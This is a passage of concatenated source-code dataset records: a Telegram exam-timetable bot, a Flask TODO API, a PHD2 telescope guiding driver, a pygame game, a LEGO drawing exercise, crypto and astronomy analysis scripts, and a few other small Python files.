self.schema.add_field(Field(name='country_of_birth', type='string'))\n self.schema.add_field(Field(name='country_of_citizenship', type='string'))\n self.schema.add_field(Field(name='date_of_birth', type='date'))\n self.schema.add_field(Field(name='position', type='string'))\n self.schema.add_field(Field(name='sub_position', type='string'))\n self.schema.add_field(Field(name='foot', type='string'))\n self.schema.add_field(Field(name='height_in_cm', type='integer'))\n self.schema.add_field(Field(\n name='url',\n type='string',\n format='uri'\n )\n )\n\n self.schema.primary_key = ['player_id']\n self.schema.foreign_keys = [\n {\"fields\": \"current_club_id\", \"reference\": {\"resource\": \"clubs\", \"fields\": \"club_id\"}}\n ]\n\n return self.schema\n","sub_path":"prep/assets/players.py","file_name":"players.py","file_ext":"py","file_size_in_byte":3302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"498880236","text":"import logging\nimport os\nfrom telegram.ext import Updater, CommandHandler, CallbackQueryHandler\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup, Update\nfrom readFile import *\nfrom uuid import uuid4\nimport helpTexts as ht\nimport log as lg\n# Enable logging\nlogging.basicConfig(\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO\n)\n\nlogger = logging.getLogger(__name__)\n\n\ndef help_command(update, context):\n 
update.message.reply_html(ht.helpText)\n\n\ndef createUniversityKeyboard():\n university = getAllUniversities()\n keyboard = []\n for uni in university:\n keyboard.append([InlineKeyboardButton(uni, callback_data=uni)])\n return InlineKeyboardMarkup(keyboard)\n\n\ndef createSemesterKeyboard(context):\n semesters = getAllSemesterOfUniversity(getResponseData(context, 0))\n keyboard = []\n for sem in semesters:\n keyboard.append([InlineKeyboardButton(sem, callback_data=sem)])\n return InlineKeyboardMarkup(keyboard)\n\n\ndef createCourseKeyboard(context):\n courses = getAllCourseOfSemester(context)\n keyboard = []\n for course in courses:\n keyboard.append([InlineKeyboardButton(course, callback_data=course)])\n return InlineKeyboardMarkup(keyboard)\n\n\ndef sendTimeTable(context, update):\n data = getTimeTable(context)\n dataString = \"\"\n dataList = []\n for i, j in enumerate(data):\n if i == 0:\n heading = f\"{j['University']} {j['Course']} - Time Table \\n\\n🎓 University - {j['University']}\\n📚 Course - {j['Course']}\\n📖 Semester - {j['Sem']}\\n\\n\"\n dataString += heading\n\n singleData = f\"📝 Subject Name - {j['SubjectName']}\\n🗓️ Exam Date - {j['Date']}\\n⏰ Exam Time - {j['Time']}\\n❓ QP Code - {j['QPCode']}\\n\\n\\n\"\n dataString += singleData\n if i != 0 and i % 10 == 0:\n dataList.append(dataString)\n dataString = \"\"\n if(dataString):\n dataList.append(dataString)\n\n if len(dataList) == 0:\n update.callback_query.edit_message_text(dataString, parse_mode=\"HTML\")\n update.callback_query.message.reply_html(\n ht.footer, disable_web_page_preview=True)\n lg.addToLog(context, update)\n else:\n update.callback_query.message.delete()\n for i in dataList:\n update.callback_query.message.reply_html(i)\n update.callback_query.message.reply_html(\n ht.footer, disable_web_page_preview=True)\n lg.addToLog(context, update)\n\n\nhelp_keyboard = [[InlineKeyboardButton(\n \"Join Channel\", url=\"t.me/kslustudentshub\")]]\nhelp_reply_markup = InlineKeyboardMarkup(help_keyboard)\n\n\ndef start(update, context):\n context.bot.send_chat_action(\n chat_id=update.message.chat_id, action=\"typing\")\n user = update.message.from_user\n channel_member = context.bot.get_chat_member(\n os.environ.get(\"CHANNEL_ID\"), user_id=update.message.chat_id)\n status = channel_member[\"status\"]\n lg.startLog(update, context, status)\n if(status == 'left'):\n update.message.reply_html(\n text=f\"Hi {user.first_name}👋🏻, to use me(Bot🤖) you have to be a member of the Law_Timetable channel in order to stay updated with the latest updates.\\n\\nPlease click below button to join and then /start the bot again.\", reply_markup=help_reply_markup)\n return\n else:\n update.message.reply_text(\n 'Choose Your 🎓University ⬇️', reply_markup=createUniversityKeyboard())\n\n\ncontactString = \"For any clarification/feedback/report Email- info.lawtimetable@gmail.com\"\n\n\ndef contactus(update, context):\n update.message.reply_html(contactString, disable_web_page_preview=True)\n\n\ndef end(update, context):\n context.user_data.clear()\n update.callback_query.message.delete()\n update.callback_query.message.reply_text(\n 'if you want again, send /start command')\n update.callback_query.message.reply_text(\n 'If its not working please report us use /contact to get contact details')\n\n\ndef getResponseData(context, position):\n return context.user_data.get(list(context.user_data.keys())[position])\n\n\ndef callBackQuery(update, context):\n query_data = update.callback_query.data\n key = str(uuid4())\n context.user_data[key] = 
query_data\n print(context.user_data)\n update.callback_query.answer()\n try:\n if query_data in getAllUniversities():\n update.callback_query.edit_message_text(\n 'Choose Your 📖Semester⬇️', reply_markup=createSemesterKeyboard(context))\n\n elif len(context.user_data) == 2 and query_data in getAllSemesterOfUniversity(getResponseData(context, 0)):\n update.callback_query.edit_message_text(\n 'Choose Your 📚Course⬇️', reply_markup=createCourseKeyboard(context))\n\n elif len(context.user_data) == 3 and query_data in getAllCourseOfSemester(context):\n sendTimeTable(context, update)\n context.user_data.clear()\n update.callback_query.message.reply_text(\n 'if you want again send /start')\n\n if len(context.user_data) > 3:\n end(update, context)\n\n except Exception as e:\n print(str(e))\n end(update, context)\n\n\ndef getTimeTablefromQPCode(update, context):\n context.bot.send_chat_action(\n chat_id=update.message.chat_id, action=\"typing\")\n user = update.message.from_user\n channel_member = context.bot.get_chat_member(\n os.environ.get(\"CHANNEL_ID\"), user_id=update.message.chat_id)\n status = channel_member[\"status\"]\n if(status == 'left'):\n update.message.reply_html(\n text=f\"Hi {user.first_name}👋🏻, to use me(Bot🤖) you have to be a member of the Law_Timetable channel in order to stay updated with the latest updates.\\n\\nPlease click below button to join and then /start the bot again.\", reply_markup=help_reply_markup)\n return\n else:\n query = update.message.text[8:].split(' ')\n context.bot.send_chat_action(\n chat_id=update.message.chat_id, action=\"typing\")\n if len(query[0]) == 0:\n qpText = f\"Please enter QPCode after /qpcode command\\nCheck /help if you have doubt or to know more\"\n update.message.reply_text(qpText)\n return\n try:\n data = getTimeTablebyQPCode(query[0])\n if(len(data) == 0):\n raise Exception(\n f\"Sorry, Data Not Found for {query[0]} QP Code\\nPlease Check QP Code and Try Again\")\n dataString = \"\"\n for i, j in enumerate(data):\n if i == 0:\n heading = f\"Time Table of QPCode {j['QPCode']}\\n\\n\\n\"\n dataString += heading\n singleData = f\"🎓 University - {j['University']}\\n📚 Course - {j['Course']}\\n📖 Semester - {j['Sem']}\\n📝 Subject Name - {j['SubjectName']}\\n🗓️ Exam Date - {j['Date']}\\n⏰ Exam Time - {j['Time']}\\n❓ QP Code - {j['QPCode']}\\n\\n\\n\"\n dataString += singleData\n\n update.message.reply_html(dataString)\n update.message.reply_html(ht.footer, disable_web_page_preview=True)\n except Exception as e:\n print(str(e))\n update.message.reply_text(\"Something Went Wrong\\nReport to Admin\")\n\n\ndef error(update, context):\n \"\"\"Log Errors caused by Updates.\"\"\"\n logger.warning('Update \"%s\" caused error \"%s\"', update, context.error)\n\n\ndef main():\n \"\"\"Start the bot.\"\"\"\n # Create the Updater and pass it your bot's token.\n\n updater = Updater(\n token=os.environ.get(\"BOT_TOKEN\"), use_context=True)\n PORT = int(os.environ.get('PORT', '8443'))\n # Get the dispatcher to register handlers\n dispatcher = updater.dispatcher\n\n # on different commands - answer in Telegram\n dispatcher.add_handler(CommandHandler(\"start\", start))\n dispatcher.add_handler(CommandHandler(\"help\", help_command))\n dispatcher.add_handler(CommandHandler(\"contact\", contactus))\n dispatcher.add_handler(CommandHandler(\"qpcode\", getTimeTablefromQPCode))\n updater.dispatcher.add_handler(CallbackQueryHandler(callBackQuery))\n\n dispatcher.add_error_handler(error)\n # Start the Bot\n updater.start_webhook(listen=\"0.0.0.0\", port=PORT,\n 
url_path=os.environ.get(\"BOT_TOKEN\"))\n updater.bot.set_webhook(\n os.environ.get(\"HOST_NAME\") + os.environ.get(\"BOT_TOKEN\"))\n logging.info(\"Starting Long Polling!\")\n\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":8658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"227447766","text":"import re\n\n\npattern=r\"^9[0-9][0-9]?$|^[1-9]\\d{1,2}$\"\n\n\ndef matchi(string):\n if re.match(pattern, string):\n print(\"MATCH\")\n else:\n print(\"NO MATCH\")\n\n\nmatchi(\"1234\")","sub_path":"pythonwork/regexnumbers.py","file_name":"regexnumbers.py","file_ext":"py","file_size_in_byte":184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"160765331","text":"#! /usr/bin/env python\n# -*- coding:utf-8 -*-\n\n__author = 'zealot'\n\n\nimport django_tables2 as tables\nfrom .models import Boo_commander\n\n\nclass Boo(tables.Table):\n class Meta:\n model = Boo_commander\n #attrs = {'class' : 'paleblue','table':'border cellpadding=10'}\n attrs = {'class' : 'paleblue',\n 'cellpadding' : 10,\n 'align' : 'left',\n 'td' :{\n 'align' :'center'\n }\n }\n","sub_path":"Boo/Boo_commander/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"112513296","text":"import json\nimport logging\nimport queue\nimport socket\nimport threading\nimport time\n\nfrom indi.device import Driver, properties\nfrom indi.device.pool import DevicePool\nfrom indi.message import const\nfrom telescopy import settings\n\n\n@DevicePool.register\nclass PHD2(Driver):\n name = \"PHD2\"\n\n general = properties.Group(\n \"GENERAL\",\n vectors=dict(\n connection=properties.Standard(\"CONNECTION\", onchange=\"connect\"),\n connection_settings=properties.TextVector(\n \"CONNECTION_SETTINGS\",\n perm=const.Permissions.READ_ONLY,\n elements=dict(\n ip=properties.Text(\"IP_ADDRESS\", default=settings.PHD2_IP),\n port=properties.Text(\"PORT\", default=settings.PHD2_PORT),\n ),\n ),\n info=properties.TextVector(\n \"INFO\",\n enabled=False,\n perm=const.Permissions.READ_ONLY,\n elements=dict(\n phdversion=properties.Text(\"PHD_VERSION\"),\n state=properties.Text(\"APP_STATE\"),\n ),\n ),\n ),\n )\n\n dithering = properties.Group(\n \"DITHERING\",\n enabled=False,\n vectors=dict(\n dither=properties.NumberVector(\n \"DITHER\",\n elements=dict(\n dither=properties.Number(\n \"DITHER_BY_PIXELS\", default=5, onwrite=\"dither\"\n ),\n ),\n ),\n dither_settle_settings=properties.NumberVector(\n \"DITHER_SETTLE_SETTINGS\",\n elements=dict(\n pixels=properties.Number(\"PIXELS\", default=1.5),\n time=properties.Number(\"TIME\", default=10),\n timeout=properties.Number(\"TIMEOUT\", default=30),\n ),\n ),\n ),\n )\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.connection = self.Connection(self)\n\n def connect(self, sender, **kwargs):\n if self.general.connection.connect.bool_value:\n self.connection.connect()\n self.general.info.enabled = True\n self.dithering.enabled = True\n else:\n self.general.info.enabled = False\n self.dithering.enabled = False\n\n def dither(self, sender, value, **kwargs):\n self.dithering.dither.dither.value = value\n amount = float(self.dithering.dither.dither.value)\n ra_only = False\n settle = {\n \"pixels\": self.dithering.dither_settle_settings.pixels.value,\n 
\"time\": self.dithering.dither_settle_settings.time.value,\n \"timeout\": self.dithering.dither_settle_settings.timeout.value,\n }\n self.connection.rpc(\"dither\", [amount, ra_only, settle])\n\n def event_settlebegin(self, **kwargs):\n self.dithering.dither.state_ = const.State.BUSY\n\n event_settling = event_settlebegin\n\n def event_settledone(self, **kwargs):\n self.dithering.dither.state_ = const.State.OK\n\n def event_version(self, phdversion, **kwargs):\n self.general.info.phdversion.value = phdversion\n\n def event_appstate(self, state, **kwargs):\n self.general.info.state.value = state\n\n def event_noop(self, **kwargs):\n pass\n\n event_loopingexposures = event_noop\n event_guidestep = event_noop\n\n class Connection:\n class Buffer:\n def __init__(self, connection, device):\n self._buffer = \"\"\n self.connection = connection\n self.device = device\n\n def append(self, msg):\n self._buffer += msg\n\n def process(self):\n messages = self._buffer.split(\"\\r\\n\")\n if messages[-1]:\n self._buffer = messages[-1]\n messages = messages[0:-1]\n else:\n self._buffer = \"\"\n\n for msg in messages:\n self.process_message(msg)\n\n def process_message(self, raw_msg):\n if not raw_msg:\n return\n\n msg = json.loads(raw_msg)\n if \"Event\" in msg:\n msg = {k.lower(): v for k, v in msg.items()}\n event_name = msg[\"event\"].lower()\n method = f\"event_{event_name}\"\n if hasattr(self.device, method):\n getattr(self.device, method)(**msg)\n else:\n print(msg)\n if \"jsonrpc\" in msg:\n print(msg)\n if msg[\"id\"] in self.connection.rpc_responses:\n self.connection.rpc_responses[msg[\"id\"]].put(msg)\n\n def __init__(self, device):\n self.buffer = self.Buffer(self, device)\n self.sock = None\n self.device = device\n self.rpc_serial = 0\n self.rpc_responses = {}\n\n def handle_incoming_messages(self):\n while True:\n logging.debug(f\"PHD2: waiting for data\")\n message = self.sock.recv(1024)\n if not message:\n logging.debug(f\"PHD2: no data, breaking\")\n break\n logging.debug(f\"PHD2: got data: {message}\")\n self.buffer.append(message.decode(\"latin1\"))\n self.buffer.process()\n\n def rpc(self, method, params, response_timeout=30):\n self.rpc_serial += 1\n id = self.rpc_serial\n payload = {\n \"method\": method,\n \"params\": params,\n \"id\": id,\n }\n q = queue.Queue()\n self.rpc_responses[id] = q\n payload_raw = json.dumps(payload) + \"\\r\\n\"\n print(payload_raw)\n self.sock.sendall(payload_raw.encode(\"latin1\"))\n try:\n response = q.get(timeout=response_timeout)\n except:\n raise Exception(\n f\"Timeout waiting for JSONRPC response for request id={id}\"\n )\n\n del self.rpc_responses[id]\n\n if \"result\" in response:\n return response[\"result\"]\n\n if \"error\" in response:\n raise Exception(response[\"error\"])\n\n raise Exception(f\"Invalid JSONRPC response for request id={id}\")\n\n def connect(self):\n ip = self.device.general.connection_settings.ip.value\n port = int(self.device.general.connection_settings.port.value)\n self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.sock.connect((ip, port))\n\n handler_thread = threading.Thread(\n target=self.handle_incoming_messages, daemon=True,\n )\n handler_thread.start()\n","sub_path":"telescopy/devices/PHD2.py","file_name":"PHD2.py","file_ext":"py","file_size_in_byte":6923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"183834666","text":"from django.shortcuts import render\nfrom django.shortcuts import HttpResponse\nfrom django.shortcuts import 
redirect\n# data models\nfrom UserManager import models\n\ndef UserManager(request):\n    # create seed data (examples kept commented out)\n    # models.UserInfo.objects.create(username=\"root\",password=\"694595504\",project_name=\"root\",role=0)\n    # obj=models.UserInfo(username=\"lsf\",password=\"694595504\",project_name=\"some project\",role=2)\n    # obj.save()\n    users=models.UserInfo.objects.all()\n    # print(users) ## result is a QuerySet => Django => []\n    return render(request,\"user_manager.html\",{\"users\":users})\n\n\ndef UserManager_add(request):\n    if request.method=='POST':\n        user=request.POST.get(\"username\",None)\n        pwd=request.POST.get(\"pwd\",None)\n        role=request.POST.get(\"role\",None)\n        project_name=request.POST.get(\"project_name\",None)\n        models.UserInfo.objects.create(username=user,password=pwd,role=role,project_name=project_name)\n    \n    return redirect(\"/userManager/userManager/\")\n\ndef UserManager_del(request):\n    if request.method=='GET':\n        id_=request.GET.get(\"id\",None)\n        models.UserInfo.objects.filter(id=id_).delete()\n    return redirect(\"/userManager/userManager/\")","sub_path":"UserManager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"142872145","text":"#importing images.\r\n#background, moving image, aiming pointer, message images\r\n\r\nbif = \"back.jpg\"\r\nmif = \"mif.png\"\r\nim='aim.png'\r\nimage='bam_logo.jpg'\r\ndisplay='oops.jpg'\r\nimport pygame, sys\r\nfrom pygame.locals import *\r\n\r\npygame.init()\r\nscreen = pygame.display.set_mode((600,300),0,32)\r\n\r\nbackground = pygame.image.load(bif).convert()\r\nmouse_c = pygame.image.load(mif).convert_alpha()\r\naim=pygame.image.load(im).convert_alpha()\r\nbam=pygame.image.load(image).convert()\r\noops=pygame.image.load(display).convert()\r\nx, y = 0, 0\r\nax,ay=0,0\r\nc=0\r\nmovex, movey = 0, 0\r\nclock = pygame.time.Clock()\r\nspeed = 180\r\n\r\nwhile True:\r\n    \r\n    for event in pygame.event.get():\r\n        if event.type == QUIT:\r\n            pygame.quit()\r\n            sys.exit()\r\n        if event.type == KEYDOWN:\r\n            if event.key == K_LEFT:\r\n                movex = -1\r\n            elif event.key == K_RIGHT:\r\n                movex = +1\r\n            elif event.key == K_UP:\r\n                movey = -1\r\n            elif event.key == K_DOWN:\r\n                movey = +1\r\n        if event.type == KEYUP:\r\n            if event.key == K_LEFT:\r\n                movex = 0\r\n            elif event.key == K_RIGHT:\r\n                movex = 0\r\n            elif event.key == K_UP:\r\n                movey = 0\r\n            elif event.key == K_DOWN:\r\n                movey = 0\r\n        if event.type==MOUSEMOTION:\r\n            ax=event.pos[0]\r\n            ay=event.pos[1]\r\n        if event.type==MOUSEBUTTONDOWN:\r\n            c=1\r\n        if event.type==MOUSEBUTTONUP:\r\n            c=0\r\n    second = clock.tick()\r\n    milli = second/1000.0\r\n    dm = milli*speed\r\n    x+=movex\r\n    y+=movey\r\n    screen.blit(background, (0,0))\r\n    screen.blit(mouse_c, (x, y))\r\n    screen.blit(aim,(ax-25,ay-25))\r\n    if c==1:\r\n        if ax<x or ay<y or ax>x+333 or ay>y+312: #shot landed outside the target\r\n            screen.blit(oops,(0,0))\r\n        else:\r\n            screen.blit(bam,(0,0))\r\n        x = x+dm\r\n        y = y+dm\r\n    if x<0:\r\n        x=0\r\n    if y<0:\r\n        y=0\r\n    if x > 600:\r\n        x = 0\r\n    if y > 300:\r\n        y =0\r\n    \r\n    pygame.display.update()\r\n\r\n","sub_path":"game2.py","file_name":"game2.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"641535855","text":"# YOUR NAME\n# CTEC 121 / Winter 2019\n# Module 4 / Problem Set 5\n# Problem 2 (50 points)\n\n\"\"\"\nUsing the graphics library, develop a Python program to draw a set of LEGOS.\nYou will find a picture of the LEGO's in a file named LEGOS.png.\n\nBe sure to create one LEGO and then use the .clone() method whenever possible\nto create the other five.\n\"\"\"\n\nfrom graphics import *\n\n\ndef main():\n\n    # 
Graphing window.\n win = GraphWin(\"Lego drawings.\", 960, 960)\n # Creating first lego.\n legoA1 = Rectangle(Point(80, 80), Point(400, 240))\n legoA1.setFill(\"Indigo\")\n legoA1.setOutline(\"Black\")\n legoA1.draw(win)\n\n # Creating first lego stud.\n # The studs are centered at X = 160 and X = 320\n # Studs are 60 pixels long, 30 high.\n legoA2 = Rectangle(Point(130, 50), Point(190, 80))\n legoA2.setFill(\"Indigo\")\n legoA2.setOutline(\"Black\")\n legoA2.draw(win)\n\n legoA3 = Rectangle(Point(290, 50), Point(350, 80))\n legoA3.setFill(\"Indigo\")\n legoA3.setOutline(\"Black\")\n legoA3.draw(win)\n\n # Clone legoA series.\n\n # Clone legoA1\n legoB1 = legoA1.clone()\n legoB1.move(500, 0)\n legoB1.setFill(\"Green\")\n legoB1.setOutline(\"Black\")\n legoB1.draw(win)\n # Clone legoA2\n legoB2 = legoA2.clone()\n legoB2.move(500, 0)\n legoB2.setFill(\"Green\")\n legoB2.setOutline(\"Black\")\n legoB2.draw(win)\n # Clone legoA3\n legoB3 = legoA3.clone()\n legoB3.move(500, 0)\n legoB3.setFill(\"Green\")\n legoB3.setOutline(\"Black\")\n legoB3.draw(win)\n\n # Clone again, for legoC\n legoC1 = legoA1.clone()\n legoC1.move(0, 240)\n legoC1.setFill(\"Red\")\n legoC1.setOutline(\"Black\")\n legoC1.draw(win)\n\n legoC2 = legoA2.clone()\n legoC2.move(0, 240)\n legoC2.setFill(\"Red\")\n legoC2.setOutline(\"Black\")\n legoC2.draw(win)\n\n legoC3 = legoA3.clone()\n legoC3.move(0, 240)\n legoC3.setFill(\"Red\")\n legoC3.setOutline(\"Black\")\n legoC3.draw(win)\n # Copy-Paste this structure, call it D. Clone from C.\n # Change the colors.\n\n legoD1 = legoC1.clone()\n legoD1.move(0, 240)\n legoD1.setFill(\"Yellow\")\n legoD1.setOutline(\"Black\")\n legoD1.draw(win)\n\n legoD2 = legoC2.clone()\n legoD2.move(0, 240)\n legoD2.setFill(\"Yellow\")\n legoD2.setOutline(\"Black\")\n legoD2.draw(win)\n\n legoD3 = legoC3.clone()\n legoD3.move(0, 240)\n legoD3.setFill(\"Yellow\")\n legoD3.setOutline(\"Black\")\n legoD3.draw(win)\n\n # Copy-Paste the previous data-structure again, call it E. Clone from B.\n # Change color to Cyan.\n legoE1 = legoB1.clone()\n legoE1.move(0, 240)\n legoE1.setFill(\"Cyan\")\n legoE1.setOutline(\"Black\")\n legoE1.draw(win)\n\n legoE2 = legoB2.clone()\n legoE2.move(0, 240)\n legoE2.setFill(\"Cyan\")\n legoE2.setOutline(\"Black\")\n legoE2.draw(win)\n\n legoE3 = legoB3.clone()\n legoE3.move(0, 240)\n legoE3.setFill(\"Cyan\")\n legoE3.setOutline(\"Black\")\n legoE3.draw(win)\n\n # Copy-Paste the data structure one last time, call it F. Clone from E.\n # Change color to black. 
Change Outline to red.\n    legoF1 = legoE1.clone()\n    legoF1.move(0, 240)\n    legoF1.setFill(\"Black\")\n    legoF1.setOutline(\"Red\")\n    legoF1.draw(win)\n\n    legoF2 = legoE2.clone()\n    legoF2.move(0, 240)\n    legoF2.setFill(\"Black\")\n    legoF2.setOutline(\"Red\")\n    legoF2.draw(win)\n\n    legoF3 = legoE3.clone()\n    legoF3.move(0, 240)\n    legoF3.setFill(\"Black\")\n    legoF3.setOutline(\"Red\")\n    legoF3.draw(win)\n    input(\"Press enter to exit drawing.\")\n    win.close()\n\n\nmain()\n","sub_path":"problem-set-5-problem-2.py","file_name":"problem-set-5-problem-2.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"169397877","text":"import glfw\nimport OpenGL\n\n\ndef main():\n    # Initialize the library\n    if not glfw.init():\n        return\n    # Create a windowed mode window and its OpenGL context\n    window = glfw.create_window(640, 480, \"My Window\", None, None)\n    if not window:\n        glfw.terminate()\n        return\n\n    # Make the window's context current\n    glfw.make_context_current(window)\n\n    # Loop until the user closes the window\n    while not glfw.window_should_close(window):\n        # Render here, e.g. using pyOpenGL\n\n        # Swap front and back buffers\n        glfw.swap_buffers(window)\n\n        # Poll for and process events\n        glfw.poll_events()\n\n    glfw.terminate()\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"glfw_example/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"291169126","text":"import helper\nimport pymongo\nimport bson\nfrom flask import Flask, request, Response\nimport json\nfrom bson import json_util\n\napp = Flask(__name__)\n\n@app.route('/')\ndef welcome():\n    return 'Welcome to the TODO app!!'\n\n@app.route('/todo/add', methods = ['POST'])\ndef create_todo():\n    req_data = request.get_json()\n    name = req_data[\"name\"]\n    desc = req_data[\"desc\"]\n    priority = req_data[\"priority\"]\n    status = req_data[\"status\"]\n    data = helper.add_item(name, desc, priority, status)\n    if data is None:\n        response = Response(\"{'error': 'Item not added - \" + name + \"'}\", status=400 , mimetype='application/json')\n        return response\n    \n    response = Response(json.dumps(data), mimetype='application/json')\n\n    return response\n    \n@app.route('/todos/all', methods = ['GET'])\ndef get_all_items():\n    client = pymongo.MongoClient(\"mongodb://127.0.0.1:27017/\")\n    db = client.TODO\n    \n    data = list(db.todo.find())\n    \n    return json.dumps(data, default=json_util.default)\n\n@app.route('/todo/update', methods = ['PUT'])\ndef update_todo():\n    req_data = request.get_json()\n    name = req_data[\"name\"]\n    status = req_data[\"status\"]\n\n    data = helper.update_item(name,status)\n    response = Response(json.dumps(data), mimetype='application/json')\n    return response\n\n@app.route('/todo/delete', methods = ['DELETE'])\ndef delete_todo():\n    req_data = request.get_json()\n    name = req_data[\"name\"]\n    data = helper.delete_item(name)\n    response = Response(json.dumps(data), mimetype = 'application/json')\n    return response\n    \n\nif __name__ == '__main__':\n    app.run(debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"430668936","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 12 11:55:12 2019\n\n@author: lth\n\"\"\"\n\nfrom utils.anticor_script import *\nimport pandas as pd\nimport numpy as np\nfrom Class.dataimporter 
import DataImporter\nfrom utils.dir import*\n\n#import data\nheader = r'E:\coventure\corr_model\data'\ndt_import = DataImporter(header)\ndt_import.importDat(r'/BTCUSD_1m.csv')\ndata1 = dt_import.getprice(60)\ndt_import.importDat(r'/ETHUSD_1m.csv')\ndata2 = dt_import.getprice(60)\n\ndat = pd.concat([data2, data1],axis =1).dropna()\ndat.columns = ['ETH','BTC']\n\n\ntrain_size = 24\ntrain_window = 96\npredict_size = 1\n#window_lst = list(range(13,21))\n#holding_lst = list(range(1,24))\nwindow_lst = list(range(13,21))\nholding_lst = list(range(1,6))\ninit_weight = np.array([0.5,0.5])\ncost = 0.01*0.5\n\n\n\nparent_path = getParent()\n \nres1 = batch_fixed (dat, train_size, window_lst, holding_lst, init_weight, cost)\ns1, d1 = res1\ncreateDir(r'\res\2price\fixed')\ns1.to_csv(parent_path + r'\res\2price\fixed' + r'\sharpe.csv')\nd1.to_csv(parent_path + r'\res\2price\fixed' + r'\down.csv')\n\nres2 = batch_dynamic (dat, train_size, train_window, predict_size, \n                      window_lst, holding_lst, init_weight,cost)\n\ns2, d2 = res2\ncreateDir(r'\res\2price\dynamic')\ns2.to_csv(parent_path + r'\res\2price\dynamic' + r'\sharpe.csv')\nd2.to_csv(parent_path + r'\res\2price\dynamic' + r'\down.csv')\n\n","sub_path":"main/2price.py","file_name":"2price.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"58247369","text":"#!/usr/bin/env python2.7\n\nimport os\nimport sys\nfrom run_scimes import *\nfrom calc_phys_props import *\nfrom colorcode import *\nfrom add_ltemass import add_ltemass\n\nworkdir = '../props'\nredo = 'y' # whether to regenerate dendrogram.hdf file\n\ndoclouds = ['A439', 'GMC1', 'GMC104', 'N59C', '30Dor', 'PCC']\ndolines = ['12', '13']\n\nfor cloud in doclouds:\n    if cloud in ['A439', 'GMC1', 'GMC104', 'N59C']:\n        type = '_12m7m'\n    elif cloud == '30Dor':\n        type = '21_12mAPEX'\n    elif cloud == 'PCC':\n        type = '21_12mTP'\n    else:\n        print('Unrecognized cloud!!')\n        continue\n    if cloud in ['A439', 'GMC1', 'GMC104', 'N59C']:\n        type13 = '_12m'\n        ascale = 2.5\n    else:\n        type13 = type\n        ascale = 4\n\n    for line in dolines:\n        label = cloud+'_'+line\n        if line == '12':\n            cubefile = '../'+cloud+'_'+line+'CO'+type+'.image.fits.gz'\n            mom0file = '../'+cloud+'_'+line+'CO'+type+'_dil.mom0.fits'\n        else:\n            cubefile = '../'+cloud+'_'+line+'CO'+type13+'.image.fits.gz'\n            mom0file = '../'+cloud+'_'+line+'CO'+type13+'_dil.mom0.fits'\n\n        criteria = ['volume']\n\n        old_dir = os.getcwd() # returns absolute path\n        if not os.path.isdir(workdir):\n            os.makedirs(workdir)\n        try:\n            os.chdir(workdir)\n            run_scimes(criteria=criteria, label=label, cubefile=cubefile, \n                       mom0file=mom0file, redo=redo)\n            calc_phys_props(label=label, cubefile=cubefile, efloor=0.1,\n                            alphascale=ascale)\n            colorcode(label=label, cubefile=cubefile, mom0file=mom0file, \n                      outdir='plots', types=['v_cen','v_rms'])\n            #sys.exit(\"Stopping here\")\n        finally:\n            os.chdir(old_dir)\n\n","sub_path":"calling/old/doscimes_all.py","file_name":"doscimes_all.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"559245475","text":"import json\nimport sys\n\nfrom . 
import methods\nfrom modules.util.color import color_string, Color\nfrom modules.util.project_exception import ProjectException\nfrom modules.parse import parse, ParseException\n\n\nmethod_dict = {\n    \"split_half\": (methods.split_half, \"Splitting in half\"),\n    \"tangent\": (methods.tangent, \"Tangent method\"),\n    \"simple_iteration\": (methods.simple_iteration, \"Simple iteration method (for systems)\")\n}\n\n\ndef solve(stream_input, stream_output):\n    method_list = _get_data_from_stdin() if stream_input == sys.stdin else _get_data_from_file(stream_input)\n    for m in method_list:\n        if not (m[\"method\"] in method_dict.keys()):\n            print(color_string(Color.RED, f\"ERROR >> Method '{m['method']}' not found.\"))\n            continue\n        try:\n            # TODO parse output to user stdout (global function, not only for lab 2)\n            result = method_dict[m[\"method\"]][0](m)\n            stream_output.write(json.dumps(result) + \"\\n\")\n        except ProjectException as e:\n            print(e)\n            return\n\n\ndef _get_data_from_file(stream_input):\n    data = json.loads(\" \".join(line.strip() for line in stream_input.readlines()))\n    valid_data = []\n    for i in range(len(data)):\n        try:\n            equation_list = data[i][\"equation\"]\n            parsed_list = []\n            var_lst = set()\n            for j in range(len(equation_list)):\n                node, var_cur_lst = parse.parse_expression(equation_list[j])\n                parsed_list.append(node)\n                var_lst |= set(var_cur_lst)\n            data[i][\"equation\"] = parsed_list\n            data[i][\"var_list\"] = list(var_lst)\n            valid_data.append(data[i])\n        except ParseException as e:\n            